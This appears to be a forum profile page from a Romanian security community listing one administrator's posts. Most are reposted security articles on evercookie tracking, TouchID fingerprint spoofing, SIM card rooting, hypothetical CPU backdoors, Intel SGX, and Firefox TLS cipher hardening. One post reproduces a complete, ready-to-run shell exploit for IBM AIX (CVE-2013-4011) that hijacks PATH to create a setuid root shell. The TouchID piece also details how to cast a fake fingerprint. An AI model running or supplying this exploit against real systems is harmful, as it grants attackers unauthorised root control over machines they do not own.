Jump to content

Nytro

Administrators
  • Posts

    18747
  • Joined

  • Last visited

  • Days Won

    718

Everything posted by Nytro

  1. evercookie -- never forget. DESCRIPTION evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available. Specifically, when creating a new cookie, it uses the following storage mechanisms when available: - Standard HTTP Cookies - Local Shared Objects (Flash Cookies) - Silverlight Isolated Storage - Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out - Storing cookies in Web History - Storing cookies in HTTP ETags - Storing cookies in Web cache - window.name caching - Internet Explorer userData storage - HTML5 Session Storage - HTML5 Local Storage - HTML5 Global Storage - HTML5 Database Storage via SQLite TODO: adding support for: - Caching in HTTP Authentication - Using Java to produce a unique key based off of NIC info Got a crazy idea to improve this? Email me! Download: http://samy.pl/evercookie/evercookie-0.4.tgz Sursa: http://samy.pl/evercookie/
  2. Versiunea mai complicata: 1. Iti creezi propriul PKI 2. Semnezi un certificat pentru fiecare HWID 3. Verifici ca user-ul sa aiba acel certificat (semnat de CA-ul tau) pentru HWID-ul sau 4. Nu stiu daca ar trebui sa iei in considerare aceasta optiune Ce face un atacator: 1. Cumpara un serial valid pentru HWID-ul lui 2. Serialul impreuna cu HWID-ul le face publice 3. Alte persoane schimba HWID (cred ca se poate) si folosesc acelasi serial
  3. Faci un algoritm prin care sa creezi din HWID un "serial". De exemplu sa zicem ca ai HWID "9005eefa-dad1-53b4-baab-56ecfbf9d55c". Poti face asa: 1. Faci md5 de prima parte (9005eefa) 2. Faci sha1 de ultima parte (56ecfbf9d55c) 3. Faci base64 pentru "dad1" 4. Faci rot13 pentru "53b4" 5. Faci hex pentru fiecare caracter pentru "baab" 6. Iei primii 3 octeti de la fiecare si ii concatenezi si poc, ai un serial (in hex de exemplu) Mai sus sunt doar cateva idei stupide, poti alege ce modalitati vrei. Sigur, se poate crack-ui daca cineva face reverse engineering la program, dar practic aceasta e o problema fara rezolvare: ORICE ar face cineva, tot se poate crack-ui.
  4. [h=1]IBM AIX 6.1 / 7.1 - Local root Privilege Escalation[/h] #!/bin/sh # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation # Date: 2013-09-24 # Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> # Vendor Homepage: http://www.ibm.com # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 # Tested on: IBM AIX 6.1 # CVE: CVE-2013-4011 echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m ' echo " [*] AIX root privilege escalation" echo " [*] Kristian Erik Hermansen" echo " [*] https://linkedin.com/in/kristianhermansen" echo " +++++?????????????~.:,.:+???????????++++ +++++???????????+...:.,.,.=??????????+++ +++???????????~.,:~=~:::..,.~?????????++ +++???????????:,~==++++==~,,.?????????++ +++???????????,:=+++++++=~:,,~????????++ ++++?????????+,~~=++++++=~:,,:????????++ +++++????????~,~===~=+~,,::,:+???????+++ ++++++???????=~===++~~~+,,~::???????++++ ++++++++?????=~=+++~~~:++=~:~+???+++++++ +++++++++????~~=+++~+=~===~~:+??++++++++ +++++++++?????~~=====~~==~:,:?++++++++++ ++++++++++????+~==:::::=~:,+??++++++++++ ++++++++++?????:~~=~~~~~::,??+++++++++++ ++++++++++?????=~:~===~,,,????++++++++++ ++++++++++???+:==~:,,.:~~..+??++++++++++ +++++++++++....==+===~~=~,...=?+++++++++ ++++++++,........~=====..........+++++++ +++++................................++= =+:....................................= " TMPDIR=/tmp TAINT=${TMPDIR}/arp RSHELL=${TMPDIR}/r00t-sh cat > ${TAINT} <<-! #!/bin/sh cp /bin/sh ${RSHELL} chown root ${RSHELL} chmod 4555 ${RSHELL} ! chmod 755 ${TAINT} PATH=.:${PATH} export PATH cd ${TMPDIR} /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null if [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL} else echo "[-] Exploit failed. Try some 0day instead..." fi Sursa: IBM AIX 6.1 / 7.1 - Local root Privilege Escalation
  5. Autor: Nytro @ Romanian Security Team Pentru ca tot au aparut zvonuri cum ca NSA ar face MITM (Man in The Middle) - pe intelesul tuturor - ar intercepta traficul pe Internet pentru a spiona ce face lumea, ar trebui sa ne informam putin despre cum sa ne pastram anonimitatea fata de astfel de probleme. Articolul este destinat persoanelor care folosesc Mozilla, nu presupunea folosirea unor VPN-uri ci pur si simplu vreau sa prezint cateva setari pe care le puteti face in browser pentru a creste siguranta in cazul in care se incearca decriptarea traficului. Primul lucru pe care il recomand e sa va instalati acest addon pentru Firefox: https://addons.mozilla.org/ro/firefox/addon/calomel-ssl-validation/ Screenshot: Addon-ul e foarte util din mai multe privinte: 1. Va permite intr-un stil foarte simplist sa vedeti cat de puternica este encriptia folosita pe site-urile vizitate 2. Va permite sa vedeti in detaliu cum s-a realizat encriptia, acordand "puncte" pentru algoritmii folositi 3. Va permite sa faceti mai multe setari utile Am inceput sa scriu acest articol deoarece Facebook, Google si alte site-uri importante, in mod implicit, ofera o encriptie (simetrica) foarte slaba: RC4 - 128 de biti! Mai multe detalii despre algoritmul RC4 si despre problemele sale gasiti aici: https://en.wikipedia.org/wiki/RC4#Security Practic articolul se rezuma la cum puteti forta Firefox sa foloseasca niste algoritmi mai puternici si mai siguri. Cum functioneaza SSL/TLS Nu vreau ca acest articol sa se transforme despre un articol SSL/TLS, dar trebuie sa precizez cateva lucruri de baza. SSL/TLS sunt niste protocoale, mai exact sunt niste reguli care trebuie indeplinite pentru a se putea realiza o conexiune sigura intre calculatorul vostru si site-ul pe care il vizitati. TLS e practic o versiune imbunatatita a SSL-ului. Versiunile SSL 1.0, 2.0 si 3.0 sunt vechi si nu ar mai trebui folosite, mai ales deoarece e cunoscut faptul ca au probleme de securitate. TLS 1.0 e o versiune imbunatatita de SSL 3.0 iar TLS 1.1 si TLS 1.2 sunt versiuni mai noi de TLS. Realizarea unei conexiuni SSL se face astfel: 1. Se realizeaza conexiunea TCP (nu intru in detalii) 2. Clientul (browser-ul) trimite "Client Hello" catre server. In request sunt specificate: versiunea SSL/TLS, de cele mai multe ori, default, TLS 1.0. Exemplu: TLS_DHE_RSA_WITH_AES_256_CBC_SHA 1. TLS = TLS sau SSL, protocolul 2. DHE = Diffie Hellman Exchange, algoritmul pentru schimbul de chei 3. RSA = Algoritmul folosit pentru autentificare 4. AES_256_CBC = Algoritmul folosit pentru encryptia simetrica (CBC e modul in care e folosit algoritmul AES pe blocuri) 5. SHA = Algoritmul folosit pentru validarea integritatii datelor (hash) 3. Serverul raspunde cu "Server Hello" in care raspunde cu versiunea suportata, de exemplu TLS 1.0 si cu cipher suite-ul (algoritmii folositi pentru encruptie) ales 4. Serverul trimite certificatul (sau certificatele), prin care se identifica. Mai exact, spune: "Uite, aceasta este dovada ca eu sunt www.cia.gov". Iar certificatul, pentru a fi recunoscut de browser ca fiind valid, trebuie sa fie semnat de catre o autoritate in domeniu: VeriSign sau alte companii recunoscute ca legitime pentru a semna certificate, deoarece si eu pot crea un certificat pentru domeniu "www.cia.gov", dar va fi semnat de Nytro, nu de VeriSign si probabil aveti mai multa incredere in ei decat in mine. 5. Clientul verifica daca certificatul este in regula, iar daca totul este ok, se face schimbul de chei. Adica se face encriptia asimetrica: se face schimbul de chei folosind algoritmul RSA (cred ca cel mai ok), DH (Diffie Hellman) sau ECDH (DH pe curbe eliptice) in functie de cipher-suite-ul ales de server din lista trimisa de client. x. Folosind cheile schimbate mai sus, se realizeaza encriptia datelor folosind algoritmul pentru criptarea simetrica (AES de exemplu) folosind cheile schimbate la "Key exchange". Dimensiunea cheilor depinde de cipher-suite. De exemplu, daca se foloseste AES pe 128 de biti, pentru a se "sparge" prin bruteforce datele trimise, e necesara incercarea a 2 ^ 128 (2 la puterea 128) de chei. Daca algoritmul este insa RC4, cum exista multe atacuri cunoscute impotriva acestui algoritm, sunt sanse mult mai mari ca o astfel de encriptie sa poata fi sparta intr-un timp mult mai scurt. Ce putem face? Dupa cum ziceam, in mod implicit, browserele trimit lista de cipher-suite completa iar serverul de obicei alege un algoritm simplu si rapid ca RC4, atat pentru viteza de incarcare a paginilor, cat si pentru compatibilitate cu browsere mai vechi. Noi il putem insa forta sa aleaga un cipher mai puternic prin simpla modificare a listei de cipher-suite-uri pe care browser-ul o trimite catre server, eliminand cipher-suite-urile "slabe" ca RC4. Setari in Mozilla Toate setarile pentru SSL se vor face navigand la pagina de configurare: about:config Pentru simplitate cautati: security.ssl Screenshot: De aici putem dezactiva anumite cipher suite-uri. Nu pot sa va spun cu certitudine care sunt sigure si care nu, dar va pot recomanda sa alegeti RSA (key exchange) si AES (pe 256 de biti). Eu am dezactivat tot in afara de RSA_AES_256_SHA: Puteti opta si pentru folosirea curbelor eliptice, in afara unui PRNG (Pseudo Random Number Generator) bazat pe curbe eliptice in care s-au descoperit probleme si se presupune ca ar putea fi un backdoor al celor de la NSA si in afara faptului ca NSA colaboreaza cu NIST (cei care definesc standardele de "siguranta") si ca astfel NSA ar putea influenta anumite curbe eliptice (de aceea am zis ca prefer RSA), puteti folosi curbe eliptice deoarece sunt mai putin consumatoare de procesor si mai "puternice". Rezultatul Inchidem browser-ul si il redeschidem si: Si suntem mai SIGURI. De asemenea, TLS 1.1 si TLS 1.2 sunt suportate de Firefox incepand cu Firefox 24 dar sunt DISABLED in mod implicit (probabil incomplet implementate). Pentru a le activa, in pagina de "about:config" cautati: security.tls Si modificati valorile: - security.tls.version.min = 0 (SSL 3.0) - security.tls.version.max = 1 (TLS 1.0) In valorile: - security.tls.version.min = 1 (TLS 1.0) - security.tls.version.max = 3 (TLS 1.2) IMPORTANT: Exista potibilitatea de a avea probleme cu stabilirea comunicatiei TLS pe servere mai vechi! In acest caz singura posibilitate este sa reactivati niste cipher-suite-uri mai slabe sau sa nu mai vizitati acel site. Daca aveti intrebari sau probleme le astept aici. Thanks, Nytro
  6. cum zice strofa asta: Hacking is not a CRIME - Si dedicatie speciala de la Nytro pentru toti dusmanii lui, pentru gaborii de peste tot!
  7. Why I Hacked Apple’s TouchID, And Still Think It Is Awesome. By Marc Rogers By now, the news is out —TouchID was hacked. In truth, none of us really expected otherwise. Fingerprint biometrics use a security credential that gets left behind everywhere you go on everything you touch. The fact that fingerprints can be lifted is not really up for debate— CSI technicians have been doing it for decades. The big question with TouchID was whether or not Apple could implement a design that would resist attacks using lifted fingerprints, or whether they would join the long line of manufacturers who had tried but failed to implement a completely secure solution. Does this mean TouchID is flawed and that it should be avoided? The answer to that isn’t as simple as you might think. Yes, TouchID has flaws, and yes, it’s possible to exploit those flaws and unlock an iPhone. But, the reality is these flaws are not something that the average consumer should worry about. Why? Because exploiting them was anything but trivial. Hacking TouchID relies upon a combination of skills, existing academic research and the patience of a Crime Scene Technician. First you have to obtain a suitable print. A suitable print needs to be unsmudged and be a complete print of the correct finger that unlocks a phone. If you use your thumb to unlock it, the way Apple designed it, then you are looking for the finger which is least likely to leave a decent print on the iPhone. Try it yourself. Hold an iPhone in your hand and try the various positions that you would use the phone in. You will notice that the thumb doesn’t often come into full contact with the phone and when it does its usually in motion. This means they tend to be smudged. So in order to “hack” your phone a thief would have to work out which finger is correct AND lift a good clean print of the correct finger. Next you have to “lift” the print. This is the realm of CSI. You need to develop the print using one of several techniques involving the fumes from cyanoacrylate (“super glue”) and a suitable fingerprint powder before carefully (and patiently) lifting the print using fingerprint tape. It is not easy. Even with a well-defined print, it is easy to smudge the result, and you only get one shot at this: lifting the print destroys the original. So now what? If you got this far, the chances are you have a slightly smudged print stuck to a white card. Can you use this to unlock the phone? This used to work on some of the older readers, but not for many years now, and certainly not with this device. To crack this control you will need to create and actual fake fingerprint. Creating the fake fingerprint is arguably the hardest part and by no means “easy.” It is a lengthy process that takes several hours and uses over a thousand dollars worth of equipment including a high resolution camera and laser printer. First of all, you have to photograph the print, remembering to preserve scale, maintain adequate resolution and ensure you don’t skew or distort the print. Next, you have to edit the print and clean up as much of the smudging as possible. Once complete, you have two options: The CCC method. Invert the print in software, and print it out onto transparency film using a laser printer set to maximum toner density. Then smear glue and glycerol on the ink side of the print and leave it to cure. Once dried you have a thin layer of rubbery dried glue that serves as your fake print. I used a technique demonstrated by Tsutomu Matsumoto in his 2002 paper “The Impact of Artificial “Gummy” Fingers on Fingerprint Systems”. In this technique, you take the cleaned print image and without inverting it, print it to transparency film. Next, you take the transparency film and use it to expose some thick copper clad photosensitive PCB board that’s commonly used in amateur electrical projects. After developing the image on the PCB using special chemicals, you put the PCB through a process called “etching” which washes away all of the exposed copper leaving behind a fingerprint mold. Smear glue over this and when it dries, you have a fake fingerprint. Using fake fingerprints is a little tricky; I got the best results by sticking it to a slightly damp finger. My supposition is that this tactic improves contact by evening out any difference in electrical conductivity between this and the original finger. So what do we learn from all this? Practically, an attack is still a little bit in the realm of a John le Carré novel. It is certainly not something your average street thief would be able to do, and even then, they would have to get lucky. Don’t forget you only get five attempts before TouchID rejects all fingerprints requiring a PIN code to unlock it. However, let’s be clear, TouchID is unlikely to withstand a targeted attack. A dedicated attacker with time and resources to observe his victim and collect data, is probably not going to see TouchID as much of a challenge. Luckily this isn’t a threat that many of us face. TouchID is not a “strong” security control. It is a “convenient” security control. Today just over 50 percent of users have any PIN on their smartphones at all, and the number one reason people give for not using the PIN is that it’s inconvenient. TouchID is strong enough to protect users from casual or opportunistic attackers (with one concern I will cover later on) and it is substantially better than nothing. Today, we have more sensitive data than ever before on our smart devices. To be honest, many of us should treat our smartphone like a credit card because you can perform many of the same financial transactions with it. Fingerprint security will help protect you against the three biggest threats facing smartphone users today: Fingerprint security will protect your data from a street thief that grabs your phone. Fingerprint security will protect you in the event you drop/forget/misplace your phone. Fingerprint security could protect you against phishing attacks (if Apple allows it) Fingerprint security has a darker side though: we need to carefully evaluate how its data is going to be managed and the impact it will have on personal privacy. First and foremost is the question of how fingerprint data will be managed. As Senator Al Franken pointed out to Apple in his letter dated September 19, we only have ten fingerprints and a stolen or public fingerprint could lead to lifelong challenges. Just imagine your fingerprints turning up at every crime scene in the country! The big questions here are: What data does Apple capture from a finger as it is enrolled? How is this data stored and how is it accessed? Can this data be used to recreate a user’s fingerprint mathematically or through visual reconstruction? In a similar fashion, fingerprints are viewed quite differently to passwords and PINs in the eyes of the law. For example, the police or other law enforcement officials can compel you to surrender your fingerprints, something they currently can’t do quite as easily with passwords or PINs despite some recent judicial challenges to that position. As a technology, fingerprint biometrics has a flaw that’s likely to be repeatedly exposed and fixed in future products. We shouldn’t let this distract us or make us think that fingerprint biometrics should be abandoned, instead we should ensure that future products and services are designed with this in consideration. If we play to its strengths and anticipate its weaknesses, fingerprint biometrics can add great value to both security and user experience. What I, and many of my colleagues are waiting for (with baited breath), is TouchID enabled two-factor authentication. By combining two low to medium security tokens, such as a fingerprint and a 4 digit pin, you create something much stronger. Each of these tokens has its flaws and each has its strengths. Two-factor authentication allows you to benefit from those strengths while mitigating some of the weaknesses. Imagine a banking application where on startup you use a fingerprint for convenience – it’s nice and quick and only needs to ensure the right person has started it. However as soon as you want to do something sensitive like check a balance or transfer some funds we kick it up a notch by asking for a two factor authentication – the fingerprint and a 4 digit pin. This combination is strong enough to protect the user against most scenarios from physical theft through to phishing attacks. If implemented correctly, TouchID enabled two-factor authentication in enterprise applications could be a good defense against phishing attacks by attackers like the Syrian Electronic Army. You can trick a user into giving up any kind of passcode but, it is much harder to trick a user into giving up his or her fingerprints from the other side of the world. Despite being hacked, TouchID is an exciting step forwards for smartphone security and I stand by our earlier blog on fingerprint security. Hacking TouchID gave me respect for its design and some ideas about how we can make it strong moving forward. I hope that Apple will keep in touch with the security industry as TouchID faces its inevitable growing pains. There is plenty of room for improvement, and an exciting road ahead of us if we do this right. For starters, Apple —can we have two-factor authentication please? Sursa: https://blog.lookout.com/blog/2013/09/23/why-i-hacked-apples-touchid-and-still-think-it-is-awesome/
  8. E tot un (stack based in tutorial) buffer overflow, dar la care, din cauza unei mici erori de logica, ai posibilitatea de a depasi buffer-ul doar cu un singur octet.
  9. Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification Summary: One hacker group claims to have bypassed the Apple iPhone 5s fingerprint reader. ZDNet spoke to the founder of a bypass-seeking bounty on how the alleged hack will be verified. By Zack Whittaker for Zero Day | September 22, 2013 iPhone 5s' fingerprint reader, dubbed "Touch ID." (Image: Apple) Hackers from the Germany-based Chaos Computer Club (CCC) claim to have bypassed the fingerprint reader in Apple's iPhone 5s, dubbed "Touch ID," just two days after the smartphone first went on sale. In a statement on its website, the CCC confirmed that the bypass had taken place, adding: "A fingerprint of the phone user, photographed from a glass surface, was enough to create a fake finger that could unlock an iPhone 5s secured with Touch ID." The shows one user enrolling their finger, while later accessing the device using a different finger with a high-resolution latex or wood glue cast. The group detailed in a blog post how it accessed the device using a fake print by photographing a fingerprint and converting it. "Apple's sensor has just a higher resolution compared to the sensors so far," said CCC spokesperson Frank Rieger on the group's website. "So we only needed to ramp up the resolution of our fake." The Chaos Computer Club is one of the longest-running hacking groups in the world. The CCC produces the world's oldest hacking conference, and this year will celebrate its 30th gathering ("30C3") in Hamburg, Germany, in December. Bounty on deck, pending confirmation Nick Depetrillo, who spoke to ZDNet on the phone on Sunday, explained how he set up a fingerprint reader bypass bounty as "putting my money where my mouth is." He submitting $100 of his own money into the crowdsourced pot. Working in conjunction with cybersecurity expert Robert Graham, who added $500 out of his own pocket to the mix, the two set up the website istouchidhackedyet.com, which catalogs those who pledge money to cracking the iPhone 5s' security feature. The website has been updated with a "Maybe!" message, confirming that a submission has been made by the hacker group, but noted that verification is still pending. To win the bounty, security researchers must video the lifting of a print, "like from a beer mug," and show it unlocking the phone, the website states. Describing the collective bounty as an "honor system," Depetrillo's website has cataloged thousands of dollars in cash (and hundreds of dollars escrowed by independent law firm CipherLaw), numerous bottles of liquor, a book of erotica, and even an iPhone 5c. But according to ZDNet's Violet Blue, who covered this story earlier in September, some are exploiting the high-profile bounty in a bid to generate press attention. One venture capitalist, who was understood to have contributed $10,000 to the bounty — though they declined to add it to a secure escrow account — reportedly misrepresented the project and spoke for the crowdsourced project "at every press opportunity." Many major news outlets as a result mistakenly attributed the project to the venture capitalist and not Depetrillo and Graham. Review and judging process Depetrillo explained that he, along with Graham, will review and judge the verification process. "The Chaos Computer Club [or any other submitter] will need to show us a complete video, documentation, and walkthrough lifting the print, re-creating the print, and having one human enrol their finger and another human somehow unlock that phone using the first person's print," he said. Depetrillo confirmed that there have been no other submissions yet, but noted that he has a "lot of respect for the CCC." He told ZDNet that he was "not surprised" when the hacker group appeared to be the first to submit a possible solution. "When we get complete documentation, we will review it and post our own technical justifications why we think this is a winning solution," he added. "If we clearly see and understand this is a sufficient and satisfactory winning solution, we will declare them the winner. "We want to convince everybody, not just ourselves, so that others could accept it as such. And everyone is free to debate it — and disagree with it. But if we believe there is a winner, we will hand over our promised money." Depetrillo said this is a one-time bounty on his part, but noted that others are welcome to start their own crowdsourced efforts for any additional hacks or bypasses. "But I look forward to sending my $100 to the winner," he said. Sursa: Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification | ZDNet
  10. Installing And Using Kali Linux, Metasploit, Nmap And More On Android Description: Installing and using Kali Linux, Metasploit, nmap and more on android danielhaake.de twitter.com/3lL060 youtube.com/user/3lL060 facebook.com/arniskinamutay external Link: Kali Linux on Android using Linux Deploy | Kali Linux Sursa: Installing And Using Kali Linux, Metasploit, Nmap And More On Android
  11. Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards Description: SIM cards are among the most widely-deployed computing platforms with over 7 billion cards in active use. Little is known about their security beyond manufacturer claims. Besides SIM cards’ main purpose of identifying subscribers, most of them provide programmable Java runtimes. Based on this flexibility, SIM cards are poised to become an easily extensible trust anchor for otherwise untrusted smartphones, embedded devices, and cars. The protection pretense of SIM cards is based on the understanding that they have never been exploited. This talk ends this myth of unbreakable SIM cards and illustrates that the cards -- like any other computing system -- are plagued by implementation and configuration bugs. For More Information please visit : - https://www.blackhat.com/us-13/ Sursa: Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards
  12. [h=3]More Thoughts on CPU backdoors[/h] I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU-backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs in the academic world, one of them being that papers are not freely published, but rather being sold on a publisher website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free). Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found on any real CPU (ever, AFAIK!). What he does is he considers how Intel or AMD could implement a backdoor, and then he simulate this process by using QEMU and implementing those backdoors inside QEMU. Loic also focuses on local privilege escalation backdoors only. You should however not underestimate a good local privilege escalation — such things could be used to break out of any virtual machine, like VMWare, or potentially even out of a software VMs like e.g. Java VM. The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care about a few important details, that I naturally didn't concern. (BTW, the main message of my previous post about was how cool technology this VT-d is, being able to prevent PCI-based backdoors, and not about how doomed we are because of Intel- or AMD-induced potential backdoors). Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each others' products, and later would likely cause a "leak" to the public about such backdoors (think: Black PR). Here people make an assumption that AMD or Intel is technically capable of reversing each others processors, which seems to be a natural consequence of them being able to produce them. I don't think I fully agree with such an assumption though. Just the fact that you are capable of designing and producing a CPU, doesn't mean you can also reverse engineer it. Just the fact that Adobe can write a few hundred megabyte application, doesn't mean they are automatically capable of also reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use some electron microscope to scan and map all the electronic elements from the processor, there is still a problem of interpreting of how all those hundreds of millions of transistors actually work. Anyway, a few more thoughts about properties of a hypothetical backdoors that Intel or AMD might use (be using). First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first, in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values of some registers, say EAX, EBX, ECX, EDX). Only then the backdoor gets activated and e.g. the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards, think of it as of a shellcode for the backdoor, that is specific for the OS, is fetched by the processor in an encrypted form and decrypted only internally inside the CPU. That should be trivial to implement, while at the same time should complicate any potential forensic analysis afterwards — it would be highly non-trivial to understand what the backdoor actually have done. Another crucial thing for a processor backdoor, I think, should be some sort of an anti-reply attack protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to breakout of a hardware VM and did something strange, e.g. installed a rootkit in a hypervisor (or some Java code somehow was able to send over all our DOCX files from our home directory). Eventually the curious admin will find out that strange CPU instruction (the trigger) after which all the strange things had happened. Now, if the admin was able to take this code and replicate it, post it to Daily Dave, then, assuming his message would pass through the Moderator (Hi Dave), he would effectively compromise the processor vendor's reputation. An anti-replay mechanism could ideally be some sort of a challenge-response protocol used in a trigger. So, instead having you always to put 0xdeadbeaf, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put a magic that is a result of some crypto operation, taking current date and magic key as input: Magic = MAGIC (Date, IntelSecretKey). The obvious problem is how the processor can obtain current date? It would have to talk to the south-bridge at best, which is 1) nontrivial, and 2) observable on a bus, and 3) spoof'able. A much better idea would be to equip a processor with some sort of an eeprom memory, say big enough to hold one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or backdoor operator, think: NSA) would have to do the following: 1) First execute some code that would read this unique value stored in eeprom for the particular target processor, and send this back to them, 2) Now, they could generate the actual magic for the trigger: Magic = MAGIC (UniqeValueInEeprom, IntelSecretKey) 3) ...and send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value. Now, the point is that the processor will automatically increment the unique number stored in the eeprom, so the same backdoor-exploiting code would not work twice for the same processor (while at the same time it would be easy for NSA to send another exploit, as they know what the next value in the eeprom should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and proved that the particular code has ever done something wrong. So, the moment I learn that processors have built-in eeprom memory, I will start thinking seriously there are backdoors out there One thing that bothers me with all those divagations about hypothetical backdoors in processors is that I find them pretty useless in at the end of the day. After all, by talking about those backdoors, and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Also this doesn't make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change). It might only be of an interest to Intel or AMD, or whatever else processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they probably can only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've been just wasting time reading this post Sorry for tricking you into this and I hope to write something more practical next time Posted by Joanna Rutkowska at Tuesday, June 02, 2009 Sursa: The Invisible Things Lab's blog: More Thoughts on CPU backdoors
  13. [h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 2)[/h] In the first part of this article published a few weeks ago, I have discussed the basics of Intel SGX technology, and also discussed challenges with using SGX for securing desktop systems, specifically focusing on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, and we will start with a discussion of how it could be used to create a truly irreversible software. SGX Blackboxing – Apps and malware that cannot be reverse engineered? A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever it leaves the processor caches and is stored in DRAM. In other words the code and data used by SGX enclaves never leave the processor in plaintext. This feature, no doubt influenced by the DRM industry, might profoundly change our approach as to who controls our computers really. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reversed engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run. Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts: A 1st stage loader (SGX loader) which is unencrypted, and which task is to setup an SGX enclave, copy the rest of the code there, specifically the 2nd stage loader, and then start executing the 2nd stage loader... The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext too. Finally the encrypted blob which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware). We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protect SGX enclave and that it is the original unmodified loader code that the application's author created. Should one bit of this loader be modified, or should it be attempted to run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, then the remote attestation would fail and the key will not be obtained. And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. And the key cannot also be mishandled by the code that runs in the SGX enclave, because remote attestation also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store on the disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within secure enclave, never leaving it, just like the key. It's data never leaves the enclave either... One little catch is how the key is actually sent to the SGX-protected enclave so that it could not be spoofed in the middle? Of course it must be encrypted, but to which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server – the server will then use this public key to send the actual decryption key encrypted with this loader's public key. This is almost good, except for the fact that this scheme is not immune to a classic main in the middle attack. The solution to this is easy, though – if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave – we can include the generated public key hash as part of the data that will be signed and put into the Quote message, so the remote sever can be assured also that the public key originates from the actual code running in the SGX enclave and not from Mallory somewhere in the middle. So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also “accidentally” sniffs some system memory or even reads out disk sectors and sends the gathered data to a remote server, encrypted, of course? We cannot know this. And that's quite worrying, I think. One might say that we do accept all the proprietary software blindly anyway – after all who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: this could be done, and actually some brave souls do that. This could be done even if the author used some advanced form of obfuscation. Can be done, even if taking lots of time. Now, with Intel SGX it suddenly cannot be done anymore. That's quite a revolution, complete change of the rules. We're no longer masters of our little universe – the computer system – and now somebody else is. Unless there was a way for “Certified Antivirus companies” to get around SGX protection.... (see below for more discussion on this). ...And some good applications of SGX The SGX blackboxing has, however, some good usages too, beyond protecting the Hollywood productions, and making malware un-analyzable... One particularly attractive possibility is the “trusted cloud” where VMs offered to users could not be eavesdropped or tampered by the cloud provider admins. I wrote about such possibility two years ago, but with Intel SGX this could be done much, much better. This will, of course, require a specially written hypervisor which would be setting up SGX containers for each of the VM, and then the VM could authenticate to the user and prove, via remote attestation, that it is executing inside a protected and properly set SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users – we just don't care, if our code correctly attests that it is in a correct SGX, it's all fine. Suddenly Google could no longer collect and process your calendar, email, documents, and medial records! Or how about a tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wide society of users... Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin this all goodness...(see below for more discussion on this). New OS and VMM architectures In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that will be making use of SGX in order to protect the user's VMs against themselves (i.e. against the hypervisor). We could go further and put other components of a VMM into protected SGX enclaves, things that 